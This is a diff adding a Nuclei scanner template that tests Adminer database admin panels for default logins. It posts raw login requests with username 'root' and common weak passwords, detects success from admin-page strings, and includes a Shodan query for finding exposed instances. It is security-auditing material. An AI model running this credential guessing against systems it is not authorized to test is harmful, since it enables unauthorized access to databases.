Update adminer-default-login.yaml

pocs_yml/nucleiFiles/default-logins/adminer-default-login.yaml

@@ -1 +1,65 @@
+id: adminer-default-login
 
+info:
+  name: Adminer Default Login - Detect
+  author: j4vaovo
+  severity: high
+  description: |
+    Adminer contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
+  reference:
+    - https://www.adminer.org
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
+  metadata:
+    verified: true
+    max-request: 5
+    shodan-query: http.title:adminer
+  tags: default-login,adminer
+
+http:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        auth[driver]=server&auth[server]=&auth[username]={{username}}&auth[password]={{password}}&auth[db]=
+
+    attack: clusterbomb
+    payloads:
+      username:
+        - root
+      password:
+        - root
+        - toor
+        - 123
+        - 123456
+        - 123456789
+    host-redirects: true
+    max-redirects: 1
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Create database'
+          - 'Privileges'
+          - 'Process list'
+          - 'Adminer'
+        condition: and
+        case-insensitive: true
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a00463044022027ae2c463658c697194e2d0b646894ab52ccfa16f7705f31c543bb3799dc75570220256a5637f05e9ed70c1a5ad1bfcfbabf3d0a7ecb4ad7ba30841e609337ed57dc:922c64590222798bb761d5b6d8e72950